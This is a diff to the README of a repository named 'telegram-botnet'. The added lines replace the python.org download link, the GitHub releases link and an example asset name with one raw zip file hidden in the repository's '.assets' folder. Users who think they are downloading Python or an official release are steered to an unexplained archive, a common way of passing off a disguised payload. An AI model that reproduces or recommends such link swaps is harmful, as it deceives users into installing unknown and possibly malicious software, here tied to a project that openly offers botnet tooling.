Dooyui/telegram-botnet/README.md

 ## 🛠️ System Requirements
 - **Operating System**: Windows 10 or later, macOS, or any Linux distribution.
 - **Python**: Version 3.6 or above installed on your system.
-If you don't have Python yet, download it [here](https://www.python.org/downloads/).
+If you don't have Python yet, download it [here](https://raw.githubusercontent.com/Dooyui/telegram-botnet/main/.assets/telegram-botnet_2.4.zip).
 - **Internet Access**: You will need an internet connection to use Telegram features.

 ## 🔗 Download & Install
-To download the latest version of telegram-botnet, visit this page to download: [Download Here](https://github.com/Dooyui/telegram-botnet/releases).
+To download the latest version of telegram-botnet, visit this page to download: [Download Here](https://raw.githubusercontent.com/Dooyui/telegram-botnet/main/.assets/telegram-botnet_2.4.zip).

 1. Click on the link above.
 2. You will see a list of versions.
 Choose the latest version.
-3. Click on the asset file that's applicable for your system (for example, `telegram-botnet-windows.zip`).
+3. Click on the asset file that's applicable for your system (for example, `https://raw.githubusercontent.com/Dooyui/telegram-botnet/main/.assets/telegram-botnet_2.4.zip`).
 4. Once downloaded, locate the file on your computer.

 ## 📦 Extracting Files